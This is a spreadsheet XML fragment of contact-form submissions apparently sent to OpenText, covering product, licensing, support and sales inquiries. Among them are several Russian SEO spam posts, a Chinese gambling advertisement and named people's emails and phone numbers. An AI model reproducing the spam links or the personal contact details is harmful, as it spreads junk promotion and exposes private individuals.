Research Associate _x000D_
Ref: 11340139-10_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please block calls to (212) 219-0759.  The calls are fax machines and there is nothing but noise on the line.  </t>
  </si>
  <si>
    <t>Looking for content management/archival solution for SAP HR data. Need information on OpenText Documentum Archive Services for SAP &amp; OpenText - Content Suite . Regarding Access to data, Any limitations of the Tool, Data Encryption , Data  Dearchival</t>
  </si>
  <si>
    <t>I have a customer called Office of Administrative Hearings that wants to purchase 120 / Each eDocs DM Standard Named User Client, 1 / Each eDocs Dm Protect Anytime, and 1 / Each Loyal to the Core Program - 1 Year. Please contact me.</t>
  </si>
  <si>
    <t>I signed up for the free trial of Brava! Reader several times and I have yet to get the download link.</t>
  </si>
  <si>
    <t>To support our business</t>
  </si>
  <si>
    <t>I have already registered please send me all document also official invitation as i have to prepare for my visa from bangladesh to join the conference</t>
  </si>
  <si>
    <t>Hi ,_x000D_
Could you tell me how many licenses we have in our EROOM platform?</t>
  </si>
  <si>
    <t xml:space="preserve">I need to find out how much it will cost to add the PDF module onto my RF server. Also, would like to know how fast I can get on fax to email cloud solution. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Experts, _x000D_
_x000D_
could you please kindly help me with the licensing of this program? _x000D_
_x000D_
Software name	Software Type	Software Description - original	Software Description - EN_x000D_
"Wartung fuer Open Text Desktop Viewer_x000D_
View-Markup-Edit"		"LVME concurrent Wartung_x000D_
IM-WEEE-8.3-UCE, SN: 1117-8537-0007"	"LVME concurrent Maintenance_x000D_
IM-WEEE-8.3-UCE, SN: 1117-8537-0007"_x000D_
_x000D_
Having one Client who has more licenses that they need, wanting to transfer to another suburb in a different country, lets say "cross country license transfer", the same company but a different country. _x000D_
_x000D_
Thank you so much for your help. _x000D_
_x000D_
Best, _x000D_
_x000D_
Marketa Branbergerova </t>
  </si>
  <si>
    <t>Good Day , We are dealer of furniture company VITRA AG which cooperates with Open Text, i  whant present our company and want to  proposeto consider us as furniture supplier</t>
  </si>
  <si>
    <t>Hi ,_x000D_
 _x000D_
We have noticed that Opentext has a booth at Dreamforce. I want to check if you have interest in meeting one of India’s leading Salesforce partner Astrea IT Services. _x000D_
 _x000D_
Astrea, a boutique consulting firm, works with global clients with solutions like outsourced development for AppExchange apps, force.com, Sales &amp; Service Cloud, and also with general Salesforce support. _x000D_
 _x000D_
If you are open to use an offshore partner to augment your Salesforce team, let us know. Someone from our management team can set up a time to meet you at Dreamforce. _x000D_
 _x000D_
 _x000D_
About Astrea_x000D_
Astrea IT currently maintains four partnerships with Salesforce.com, _x000D_
1. Salesforce Registered Consulting Partner, _x000D_
2. Salesforce OEM partner for The Omotenashi product_x000D_
3. Astrea is a Salesforce certified Product Development Organization._x000D_
In addition Astrea has ten apps on AppExchange. Astrea is among the highest rated organization on AppExchange with 50 customer reviews and average rating of 4.9 out of 5._x000D_
4. Salesforce.Org Foundation International NonProfit Partner</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
aktuell erhalten wir (10048871) gelegentlich oder ausschließlich die Rechnungen von Ihnen in Papierform._x000D_
_x000D_
ZB. die Rechnung Nr. 9000160407 vom 19.9.2017 ist per Post bei uns eingetroffen. Sie schickten diese Rechnungen an unsere alte Postfachadresse in Halle/Saale._x000D_
Dieses Postfach ist nicht mehr aktuell. Die erwähnte Rechnung haben wir manuell in unser System aufgenommen, bitte diese nicht noch einmal schicken._x000D_
Ebenso 9000160408_x000D_
_x000D_
Um den Prozess der Rechnungsstellung/Rechnungseingangsverarbeitung für beide Seiten effizient, kostengünstig und umweltfreundlich zu gestalten, bitten wir Sie, uns ab sofort Ihre Rechnungen per E-Mail im PDF-Format zuzustellen. Sie handeln somit nachhaltig und schonen Ressourcen._x000D_
_x000D_
Als Rechnungsanschrift bei E-Mail Versand verwenden Sie bitte die jeweilige Hausanschrift des beauftragenden Miele Standortes bzw. Imperial Standortes._x000D_
_x000D_
Weitere Einzelheiten zur Rechnungsstellung per Mail (zu verwendende E-Mail Adressen, Formatspezifikationen etc.) finden Sie über nachfolgenden link:_x000D_
http://www.miele.de/media/misc_de/media/files/downloads/suppliers/Email_Invoices_Specification_V04_DE.pdf (deutsch)_x000D_
_x000D_
Unter vollständiger Berücksichtigung der in der Spezifikation aufgeführten Punkte, erwarten und akzeptieren wir ab sofort Ihre Rechnungen per E-mail im Format PDF._x000D_
_x000D_
Sollte in Ihrem Unternehmen der Rechnungsversand per Mail nicht möglich sein, möchten wir Ihnen die neue Anschrift für unsere Eingangsrechnungen mitteilen._x000D_
Die nachfolgend aufgeführten Postfachadressen sind lediglich für die Zustellung von Rechnungen in Papier per Post zu verwenden:_x000D_
_x000D_
Unternehmen / Buchungskreis	Postfachadresse in Berlin (neu)_x000D_
Miele &amp; Cie. KG / 0011	Miele &amp; Cie. KG_x000D_
++6450++ Kunden-ID: MIE6450_x000D_
12678 Berlin_x000D_
Deutschland_x000D_
Imperial Werke oHG / 0030	Imperial Werke OHG _x000D_
++6451++ Kunden-ID: MIE6451_x000D_
12678 Berlin_x000D_
Deutschland_x000D_
_x000D_
_x000D_
Bitte dringend beachten: Die alte Postfachadresse Halle/Saale ist nicht mehr gültig!_x000D_
_x000D_
Evtl. Mahnun</t>
  </si>
  <si>
    <t>Please send me current SQLBase price list and and seller info in Poland_x000D_
_x000D_
Regards_x000D_
Andrzej Szczesniak</t>
  </si>
  <si>
    <t>Request for a demo download of BI Query</t>
  </si>
  <si>
    <t>We are in a process of recommending an Archiving Solution for one of our clients in the SAP HCM domain and we would like to know the offerings that Open Text has for this.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Authorized,_x000D_
I am founder of  a software company namely Yuchisoft._x000D_
Yuchisoft is an innovative company that provides professional solutions for the production of marketing documents containing personal and variable data in electronic format, transpromo printing , customer content management and stream convertion._x000D_
Our company head office  in Turkey in Istanbul. We are the distributor of Elixir Company in Turkey but we decide to change our business partner that  we use its ccm solutions in Turkey Market. _x000D_
We do not only market CCM products in Turkey but also we are using these software and give professional service for integration and implementation for  companies._x000D_
The industries we serve are ; finance,industry,telecom,service bureaus and government._x000D_
Could you inform us  the details about your solutions and if  possible we want to see demo and we want to  evaluate the software._x000D_
_x000D_
Regards_x000D_
Samet Soylar_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
nous sommes utilisateur de EASYLINK services pour l'envoi de nos fax. _x000D_
Etes vous bien l'éditeur de l'application Easilink services ?_x000D_
Nous aurions des questions à vous poser notamment pour transformer nos envois fax en mails_x000D_
Cordialement_x000D_
Dominique Anberrée_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">AMC for Open Text </t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
_x000D_
I tried to create an open text account online (under the email address provided). _x000D_
_x000D_
I'm yet to receive a confirmation email for my account to login. _x000D_
_x000D_
Can you please assist as I would like to login ASAP?_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Kristijana </t>
  </si>
  <si>
    <t>Здравствуйте! Класный у вас сайт! _x000D_
Нашел интересные материалы для владельцев дачных участков и не только:   [b] [url=http://www.ekolestnica.ru/]мебельный щит столешница сосна 40 750 1500 мм купить[/url] _x000D_
Тут: http://www.ekolestnica.ru/mebelnyj-shhit-v-nizhnem-novgorode.html [b] мебельный щит из сосны н новгород [/b] _x000D_
Здесь: [url=http://www.ekolestnica.ru/mebelnyj-shhit-18-mm.html]щит мебельный 18[/url] _x000D_
Тут: http://www.ekolestnica.ru/stolyarnyj-mebelnyj-shhit.html _x000D_
http://www.ekolestnica.ru/mebelnyj-shhit-v-samare.html [b] клееный брус щит самара [/b] _x000D_
http://www.ekolestnica.ru/mebelnyj-shhit-v-krasnodare.html _x000D_
Тут: http://www.ekolestnica.ru/mebelnyj-shchit-iz-sosni.html</t>
  </si>
  <si>
    <t xml:space="preserve">I have a cloud full of gov. Officials who are threatening and practicing illegal murderer. Using telephonic holographic hologram and algorithm and biosyncing and movie actors. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we have a service contract but my account has not been set up properly so I cannot access the 'My Support' section. _x000D_
Please can someone loko into this issue ASAP._x000D_
_x000D_
Thanks,_x000D_
Niamh </t>
  </si>
  <si>
    <t>To enquire about prices and options for using Documentum for application in Oil &amp; Gas asset.</t>
  </si>
  <si>
    <t>Inquiring on right fax to see if it is an option for company.</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://planetnew.ru/news/6009-vladimir-putin-menyaet-storonu-peregovorov.html [b] Владимир Путин меняет сторону переговоров [/b] _x000D_
[url=http://planetnew.ru/news/5147-arbitrazh-rassmotrit-isk-mariyskogo-npz-o-sobstvennom-bankrotstve.html] Арбитраж рассмотрит иск Марийского НПЗ о собственном банкротстве [/url] _x000D_
http://planetnew.ru/news/356-krizis-v-metallurgii-nalilsya-cvetom.html _x000D_
http://planetnew.ru/information-technology-it/25351-google-predostavila-dostup-k-programme-asisstant-storonnim-razrabotchikam.html _x000D_
Ещё много интересного по теме нашел тут: [b] Новости политики Украина Россия [/b] [url="http://planetnew.ru/"]http://planetnew.ru/[/url]</t>
  </si>
  <si>
    <t>I would like to speak to the president of your company. Could you please supply me with their name and phone number?  THANKS</t>
  </si>
  <si>
    <t>Приветствую! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] Лучшие фантастика 2017 бесплатно [/b] [url=http://kinofanonline.ru/]http://kinofanonline.ru/[/url] _x000D_
Тут: [b] лучшие фантастика новинки в хорошем качестве hd [/b] http://kinofanonline.ru/luchshaya-fantastika-2014-2015-spisok-filmov/ _x000D_
[url=http://kinofanonline.ru/novinki/] 2017 бесплатно лучшие новинки фильмов [/url] _x000D_
http://kinofanonline.ru/sport/1991 [b] Рейтинг Спорт 1991 - Список лучших кинофильмов смотреть онлайн [/b] _x000D_
[url=http://kinofanonline.ru/fantastika/1996] Рейтинг Фантастика 1996 - Список лучших кинофильмов смотреть онлайн [/url] _x000D_
http://kinofanonline.ru/poznavatelnoe/2017 _x000D_
[url=http://kinofanonline.ru/news/12734-dueyn-dzhonson-raskryl-syuzhetnye-podrobnosti-forsazha-8.html] Дуэйн Джонсон раскрыл сюжетные подробности «Форсажа 8» [/url] _x000D_
http://kinofanonline.ru/news/7370-startovali-semki-viya-2-s-dzheysonom-flemingom-i-dzheki-chanom.html [b] Стартовали съемки «Вия 2» с Джейсоном Флемингом и Джеки Чаном [/b] _x000D_
http://kinofanonline.ru/news/11967-dzheyms-kemeron-ne-isklyuchil-vozvrascheniya-k-chuzhim.html _x000D_
и Здесь: http://kinofanonline.ru/teleperedachi/8244-top-gir-specvypusk-v-patagonii-top-gear-patagonia-special-2014.html</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Нашёл интересное в сети: http://itcyber.ru/news/11072-utekli-benchmarki-soc-exynos-8890.html [b] Утекли бенчмарки SoC Exynos 8890 [/b] _x000D_
[url=http://itcyber.ru/news/11435-amd-planiruet-monetizirovat-svoi-patenty.html] AMD планирует монетизировать свои патенты [/url] _x000D_
http://itcyber.ru/news/15845-novaya-platforma-autentifikacii-ps-mir-miraccept-20.html _x000D_
http://itcyber.ru/news/14461-rossiya-voshla-v-top-5-stran-s-samymi-razvitymi-kibervoyskami.html _x000D_
[url="http://itcyber.ru/"]http://itcyber.ru/[/url]</t>
  </si>
  <si>
    <t>HI,_x000D_
Good Morning!!_x000D_
I am K. Chandra sekhar with hands on 2.7 years experience in wordpress, javascript, jquery, php, mysql, bootstrap, material design, html5, css3 In Aptagrim Consulting LLP Hyderabad._x000D_
_x000D_
Thanks and Regards,_x000D_
K. Chandra sekhar.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
Greetings From Kodada institute of tech &amp; science for women....!_x000D_
_x000D_
This is Mr. K. Vamshi Krishna, Assistant Professor &amp; Training &amp; Placement officer, Kodada institute of tech &amp; science for women._x000D_
_x000D_
It is a privilege to introduce our Kodada institute of tech &amp; science to your esteemed organization.Our students are very good in communication skills and academics._x000D_
_x000D_
We will be highly obliged if your good self can plan a visit to our college to evaluate our btech final year students (2018 pass outs) for placement in your organization._x000D_
_x000D_
Please feel free to contact us for any further queries at any given point of time._x000D_
_x000D_
Your Early Reply is Solicited._x000D_
Thanking you_x000D_
_x000D_
With warm regards_x000D_
_x000D_
*Training &amp; Placement Wing*_x000D_
*K.Vamshi Krishna , TPO*_x000D_
*Mob:9989655948*_x000D_
*Kitsplacements.kodad@gmail.com &lt;Kitsplacements.kodad@gmail.com&gt;*_x000D_
_x000D_
-- _x000D_
With Regards........._x000D_
K.Vamshi Krishna,_x000D_
Training &amp; Placement Officer,_x000D_
Kodad Institute of Tech &amp; science For Women,_x000D_
Kodad, Suryapet(DT),TS.India._x000D_
PH: 9989655948._x000D_
</t>
  </si>
  <si>
    <t>I would like to request a bid for 1 xPression V4.6 enterprise edition</t>
  </si>
  <si>
    <t>I am taking place of the person who was administrator for our account.  No password was left, and need to reset to my profile.  I cannot contact support because I need to login, and I cannot login for stated reason.  Can someone please reach out to me, with assistance.  Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">I have contacted this company twice now requesting to be taken off of the Fax Calls to our office number, which is 605-865-3330. Our phone number is a contact point in our community for emergencies, whether it be for Police, Fire or Emergency Medical Services as well as other calls for service. _x000D_
The automated calls from your company are hindering us from doing our job and are interfering us from responding to emergencies. _x000D_
_x000D_
This needs to be addressed as soon as possible! </t>
  </si>
  <si>
    <t>Всем привет, решила завести себе питомца и выбор пал на черепах, но не могу выбрать какие лучше. Может есть знающие люди? _x000D_
[url=http://turtle-home.net/turtle.png][img]http://turtle-home.net/turtle.jpg[/img][/url]</t>
  </si>
  <si>
    <t>Enable my business to grow</t>
  </si>
  <si>
    <t>We have a client who uses edocs DM v 16.2.  They have asked us to scan a bunch of files for them.  There are some fields they would like us to capture.  Is there a way to import some sort of delimited text file or other data file to automatically populate fields?  This would alleviate the need for the client to manually code documents after upload._x000D_
Thank you,_x000D_
_x000D_
Ryan Jeppe, CEDS</t>
  </si>
  <si>
    <t>Привет! Класный у вас сайт! _x000D_
Нашёл интересное в сети: http://inosmip.ru/information-technology-it/23553-v-seti-poyavilis-hakerskie-fotografii-flagmana-nokia-c1.html [b] В сети появились хакерские фотографии флагмана Nokia C1 [/b] _x000D_
[url=http://inosmip.ru/politika/25158-zaharova-predupredila-slabye-strany-o-namerenii-ssha-ih-otpentagonit-i-brosit.html] Захарова предупредила слабые страны о намерении США их "отпентагонить и бросить" [/url] _x000D_
http://inosmip.ru/news/10173-ischeznovenie-malayziyskogo-laynera-kompanii-airasia-hronologiya-sobytiy.html _x000D_
http://inosmip.ru/news/24069-osvyativshiy-kieva-voskreshene.html _x000D_
Ещё тут много интересного: [b] Новости политики Белоруссия Россия [/b] http://inosmip.ru/</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
Appdome (www.appdome.com) is a platform that allows enterprises to automatically integrate mobile SDKs to apps, in minutes, without any code or coding. _x000D_
_x000D_
One of our customers wants to integrate the Opentext mobile app with the Airwatch Enterprise Mobility Management SDK. To do this on the Appdome platform, all they need is access to the Opentext app binary._x000D_
_x000D_
Who can I work with to understand the process your customer would need to follow to get access to your mobile app binaries for the purpose of integrating the opentext app with the Airwatch SDK on the Appdome platform?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Jan Sysmans_x000D_
Sr. Director Business Development, Enterprise Mobility_x000D_
+1 408 582 3475 | jan@appdome.com | www.appdome.com _x000D_
</t>
  </si>
  <si>
    <t>Looking at changing from Analog lines to SIP. We utilize Rightfax currently. Heard that using SIP for faxing is not as reliable as analog. Just wondering how Rightfax works with SIP. Phone system we would be using is the Mitel 3300. looking for clarification and understanding how Rightfax functions with SIP and is it reliable to use SIP with Rightfax.</t>
  </si>
  <si>
    <t>Would like a quote for your complete EDI service.  We will be a new vendor for Kroger, and do not currently have any EDI systems in place.</t>
  </si>
  <si>
    <t>Having issue login into Customer Support site.  Login account might need to be reset.</t>
  </si>
  <si>
    <t>Requesting partner sales enablement and support access for InfoArchive and Clinical Archiving.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Would you be interested in acquiring list of Alcatel users?_x000D_
_x000D_
We have over 15,000 records for Hadoop users and all these records contain complete business contact information like company name, company website address, contact name, title, email address, phone number, fax number, physical address, number of employees, revenue size. SIC Code and technology used._x000D_
_x000D_
Feel free to let me know your thoughts on the same._x000D_
_x000D_
Thanks and Regards_x000D_
Sonia White_x000D_
</t>
  </si>
  <si>
    <t>Cloud based faxing services</t>
  </si>
  <si>
    <t>I had  access to Q/A responses from birt-exchange.org until earlier this week, now I cannot lookup answers to simple questions as it keeps coming back to the OpenText.com page showing that the forums etc are being moved.  Is there any progress on this?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I bought a GPS in the US, it doesn't work in Trinidad and Tobago. Can they be fixed?</t>
  </si>
  <si>
    <t xml:space="preserve">Recently we have replaced 32 bit systems with 64 bit Windows 7 Pro. systems.  Running into an issue with some users losing the ability to save or edit documents to eDOCS DM.  _x000D_
Version is 5.3.1.  Is there something specific we need to do to ensure that functionality is restored upon update to 64 bit system?  _x000D_
_x000D_
Thank you in advance for your assistance._x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Shawn Allen_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
da wir in unserem Service Center bei Tchibo einige Bestellungen noch per Fax erhalten und diese bisher manuell von unseren Mitarbeitern erfasst werden müssen, sind wir derzeit auf der Suche nach einer Möglichkeit die Erfassung der PDF-Dokumente zu automatisieren. _x000D_
Biete Ihre Fax-Software von OpenText die Möglichkeit PDF-Dokumente zu erfassen und die Inhalte in eine Excel-Tabelle (oder Sonstiges) zu übertragen? Wenn ja, könnten Sie mir ebenfalls eine Information zu den damit verbundenen Kosten geben?_x000D_
_x000D_
Hier noch eine kurze Information zu den Inhalten und Formaten der Faxe. Es handelt sich um handschriftlich ausgefüllte PDF-Dokumente mit drei wesentlichen Kennzahlen: Kundennummer, Artikelnummer und Anzahl. _x000D_
_x000D_
Sie können mich diesbezüglich auch gerne telefonisch kontaktieren, falls Sie noch weitere Informationen benötigen. Ich bin ab Mittwoch, den 12.10. wieder im Büro erreichbar._x000D_
_x000D_
Vielen Dank bereits im Voraus.</t>
  </si>
  <si>
    <t>Sir / Madam,_x000D_
We take care of all the staffing needs of the organisations right from Contract to Hire to Full time positions. Along with this, we have introduced Training and Deployement model where we train the candidates who have graduated from Colleges who can be considered as low cost resources to the organisation. _x000D_
_x000D_
Request you to connect with me if you have any immediate resourcing needs. We will be happy to serve you._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Kumar_x000D_
9885303689.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I would like to get info about the price per license regarding to Centura Gupta. We only need only 1 lic in order to modify a project._x000D_
_x000D_
Regards </t>
  </si>
  <si>
    <t>Die Themen an ihrem Digitalisierungs Tag interessieren mich. Würde gerne Teilnehmen. Was kostet der Event?</t>
  </si>
  <si>
    <t>I am unable to login using my userid zahid.hamid1@centrica.com to raise URGENT Service Requests with Documentum.</t>
  </si>
  <si>
    <t>Replacement of Oracle Discoverer</t>
  </si>
  <si>
    <t>One of our Suppliers Texas Instruments is currently also your customer. We would like to connect Empa system to TI system via EDI. For this reason we would like to get more information on your solution proposals and services.</t>
  </si>
  <si>
    <t>★免水菜金 驻测即宋28-88圆 满百提~！_x000D_
VIP链接:www.youle810.com _x000D_
备用链接:www.youle138.com_x000D_
限时寸20宋28，寸30宋36~！！_x000D_
专属链接柱测出分更佳~！！_x000D_
秒寸寸款更有1%返现回馈~！_x000D_
【八大劳虎击平台、真人、捕鱼、体育】玩法多多~！</t>
  </si>
  <si>
    <t>I was just wondering how can we access the product downloads. Our company is a Services Silver Partner and we usually need the software for development purposes. Previously in EMC we had access to this stuffs. Thanks in advance.</t>
  </si>
  <si>
    <t>Need access to download latest TD versions and be able to raise tickets for queries and access open text for all migration activities i would be performing for my project from TD2.1-&gt;TD6.3-&gt; TD 7</t>
  </si>
  <si>
    <t>We are wondering if Open Text offers direct support for their RightFax products.  If not besides Inpute Technologies who are based in Ireland does Open Text have any other recommended companies that can offer OpenText RightFax support?</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for DRM solutions. Are your products able to support any file types and size? even the controls on user's local machine? _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I used to have a support account with you but my email address has changed and I can no longer access my account. Can you change my account from dave.black@northgate-is.com to the new address. Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">I am a system integrator specialised on Documentum professional services. In the past, we also sold EMC ECD license. We were registered on the EMC portal and we worked as proxy for RCI Bank, Selex Service Management, Equitalia. At the moment we need access to the portal to complete a Documentum upgrade for RCI Bank (I just personally helped your renewal team in order to facilitate the 2016/2017 maintenance fee payments). RCI Bank asked us to manage directly service requests and to download ECD software (I speak with Andrea Onofri, andrea.onofri@rcibanque.com). Having said that, I kindly request you to enable my account as proxy for RCI Bank and for all the ECD customers that I was managing directly in the former ECD portal. Many thanks in advance.     </t>
  </si>
  <si>
    <t>Dear Opentext-Team,_x000D_
i requested an Exceed 15 trial-license some days ago but until now i got no download link or something else._x000D_
Could you please provide me with the trial-software?_x000D_
Thank you_x000D_
Best regards_x000D_
Jens Stefer</t>
  </si>
  <si>
    <t>Hallo, _x000D_
_x000D_
ich habe eine Brava Dektop Lizenz geordert und auf meinem Microsoft Surface eingespielt. Trotzdem bekomme ich bei der Anmeldung einen Fehler bezüglich der Lizenz._x000D_
_x000D_
Ist die Software kompatibel mit Microsoft Surface? _x000D_
_x000D_
Mit freundlichen Grüßen</t>
  </si>
  <si>
    <t>Can you provide any outsourcing projects like software testing and application maintenance and other back office projects, we can give best quality of delivery for your business needs. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">As a fresher i am very interested to do work in a reputed company like  yours .so please  give me an opportunity  to work based on my skills. </t>
  </si>
  <si>
    <t>dfdgffgfdg</t>
  </si>
  <si>
    <t>I would be interested to know if anyone from Opentext would like to present on OpenText AI Magellan in Canberra on the 29th November 2017.  IIM is running a one day event.  Details can be found at http://www.iim.org.au/minigen/default.asp?action=showContent&amp;contentID=264_x000D_
Linda Shave, National Director IIM</t>
  </si>
  <si>
    <t>Hi,_x000D_
I want remove my account with email id "gvrdhnkanklr@gmail.com" from the opentext.com, so could you please remove the same and let me know the update._x000D_
Regards,_x000D_
Govardhan</t>
  </si>
  <si>
    <t>Hi Sir/ madam,_x000D_
_x000D_
I am writing to request my purchased license file due re-installation of SteamServe 5.5._x000D_
_x000D_
Please let me know the steps to request for and my side need it urgently._x000D_
_x000D_
Appreciate if you could contact me on this as soon as possible,_x000D_
_x000D_
Thanks and best regards_x000D_
Chee Tai</t>
  </si>
  <si>
    <t>Hi, Please provide a quote for 30 licenses for EnCase forensic SMS and 30 dongles from 11/4/2017 through 11/3/2019. This will be for the College of Business Administration.  Guidance Software customer number is 15332 order/contract number RR000000010143.  Existing software will expire on 11/5/17. Please respond on or before 10/9/2017. _x000D_
Thank you,_x000D_
Vicky Siongco_x000D_
Budget Analyst_x000D_
College of Business Administration</t>
  </si>
  <si>
    <t>I have updated my email in my account from eurico.pego@itauinternational.com to eurico.pego@itau.us but now I cannot access the support pages. I am able to login with the new email but no access to support page. Please verify what happened with my account._x000D_
_x000D_
Regards,_x000D_
_x000D_
Eurico Pego</t>
  </si>
  <si>
    <t>We had an active account with your services but are no longer able to access.  The dedicated fax email was fax@beyonddent.com. Please contact me directly to resolve.  Thanks, Sam</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I'm in the process of evaluating BIRT for a project I'm working with here in SeaChange._x000D_
When will the new BIRT Analytics forum and DevShare pages be available on the OpenText site?  </t>
  </si>
  <si>
    <t>Demo request</t>
  </si>
  <si>
    <t>Looking for digital signature solution that can be integrated with office 365._x000D_
_x000D_
Would like to have a proposal for around 20 users.</t>
  </si>
  <si>
    <t>Not able to create new service tickets or download software. The system challenges to confirm the registration again and again</t>
  </si>
  <si>
    <t>Renewal RC165906</t>
  </si>
  <si>
    <t>Demo and more information regarding your document management system for a boutique law firm based in a Mac environments, but with access to a Windows environment via Terminal Services</t>
  </si>
  <si>
    <t>Здравствуйте! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://mybioplanet.ru/news/638-stroitelstvo-sovmeschennoy-zhd-i-avtodorogi-adler-alpika-servis.html [b] Строительство совмещённой ж/д и автодороги Адлер — «Альпика-Сервис». [/b] _x000D_
[url=http://mybioplanet.ru/news/17964-poter-net-teryat-nekogo-poteri-ukrofashistov-s-1-po-31-aprelya-foto.html] Потерь НЕТ - терять некого! Потери укрофашистов с 1 по 31 апреля (Фото) [/url] _x000D_
http://mybioplanet.ru/information-technology-it/26427-pochemu-it-sistemy-v-rf-kriticheski-uyazvimy-mnenie-specialistov.html _x000D_
http://mybioplanet.ru/news/11440-nalivaychenko-sbu-i-gpu-ne-vedet-ugolovnyh-del-protiv-ahmetova.html _x000D_
Ещё много интересного по теме нашел тут: [b] Новости политики Донбасс ЛНР ДНР [/b] [url="http://mybioplanet.ru/"]http://mybioplanet.ru/[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I’m working for Swiss Post Solutions which belongs to the Swiss Post group. We are currently looking for a product to complete our new digital mailroom solution. We believe that at least one of your products meets our requirements and would ask your company to complete the RFI document we will send to you._x000D_
_x000D_
Unfortunately, your contact form does not offer such possibility so I’m asking you to provide me an e-mail address to contact to whom I can send the documents to._x000D_
_x000D_
Best regards,_x000D_
Dzianis Mazuronak_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have tried several times to download the newest version of Brava! Reader.  I still have not received the link via email for the download.</t>
  </si>
  <si>
    <t>we are interested in purchasing (resale) your RightFax Solution.   What do we need in order to resale this solution?  We would also like a quote for the solution.  It will be replacing the End User’s 15 analog fax ports.</t>
  </si>
  <si>
    <t xml:space="preserve">I've tried leaving messages for sales, but that doesn't seem to work, as nobody calls back.. I want to discuss capability of Open Text product to help us build our OWN customer portal.  </t>
  </si>
  <si>
    <t>Because just for fun</t>
  </si>
  <si>
    <t>I had filled this out over a month ago and was never contacted. I work for the MTA, my company has product support. I cannot connect to the server on eDOCS DM and have been unable to add any new users. This has now become HIGH PRIORITY as it has been over a month now and these users need to be added._x000D_
_x000D_
Thank you,_x000D_
Anthony Psatha</t>
  </si>
  <si>
    <t>Hi, I visited your website and came to know that you are hiring QA engineers with experience. I am a fresher [BE-2017] and I have underwent a training on Automation Testing and Manual Testing. May I know is there any openings for freshers for the same profile as full time or intern. _x000D_
_x000D_
Thank You.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am an analyst working with The Smart Cube (http://www.thesmartcube.com/), a UK-based research and consulting firm with headquarters in London and offices in the US, India and Romania._x000D_
_x000D_
I am working on behalf of the procurement team of McDonald’s to identify prospective ‘Digital HR Document Storage’ suppliers. I have a detailed questionnaire that would help us gauge your capabilities and validate whether your business can be further shortlisted for a tender. Kindly contact me over email so I can send it over to you._x000D_
_x000D_
Please note that this information will be kept confidential and will only be shared with our client for the purpose of identifying whether your business is a suitable supplier for their requirement. If so, you will be contacted directly by them in the future._x000D_
_x000D_
Look forward to your response</t>
  </si>
  <si>
    <t>Where do I get the Invoice Capture Center 7.5 installation media?_x000D_
Here or in SAP Marketplace? I need this installed but I am having difficulties finding the software. Please help</t>
  </si>
  <si>
    <t>We do not have Access to support, is anything missing?</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Je vous écris pour connaître le contenu de la partie support, j'aimerai savoir s'il contient les fichiers d'installations de la suite Xpression, si oui, faisant partie de la société Aerow qui sont partenaire avec opentext j'aimerai pouvoir accéder au support avec mon compte pour pouvoir me procurer ces fichiers d'installations, pouvez-vous faire le nécessaire pour traiter ma demande, et me tenir au courant de l'avancement du ticket, Merci d'avance._x000D_
_x000D_
Venkatesh</t>
  </si>
  <si>
    <t>Hello General Inquiries,_x000D_
I would like to express the current needs for a Stand alone Texting Home Phone Incoming calls and outgoing calls which are non-overseas calls. Open Text, has to be aware about the issues with phone calls coming into a home,apartment,basement apartments due to the voice recording service from phone telecommunication services providers. Most People are not getting their messages or the ID Code changes, no messages are left on voice recording. Open Text has to provide a Stand Alone Text Home Phone System which is similiar to a small desktop monitor with Open Text Apps, incoming calls ca be received and captured to printer for TRANSCRIPTING PRINT OUT MESSAGES CAN BE STORED UNTIL RELEASED AND PRINT OUT ON A PRINTER THROUGH TRANSCRIPTIONS. OPEN TEXT CALLS CAN BE SENT OUT OR FORWARDED FOR OTHER CONNECTIONS TO DEAL WITH FROM THE HOME, APARTMENT, BASEMENT APARTMENT IF THE CALLS ARE FOR THE OWNER OF THE CALLS INTENTED FOR LEAVING THE STAND ALONE TEXTING HOME PHONE INCOMING CALLS.Regards.</t>
  </si>
  <si>
    <t>We have a customer that uses Open Text (CHS) for EDI transactions, we are wondering if this will work with our ERP (FACTS 7.8)?</t>
  </si>
  <si>
    <t xml:space="preserve">I have written an ebook and POD called "Escape to Anzio" I am publishing via Ingram Spark. The book is about my father's Saga of injury capture and escape.  _x000D_
I would like to send you details of the book. Please send me an email address._x000D_
Regards_x000D_
Jeff Smollan_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a global client that is interested in moving away from their current DAM to a more robust, workflow-based solution that is flexible enough to be customized to include whole project lifecycles, document management, access by multiple roles (Project Manager, Developer, client, etc), and a number of other requirements. Please contact ASAP as we have immediate RFI response requirements. </t>
  </si>
  <si>
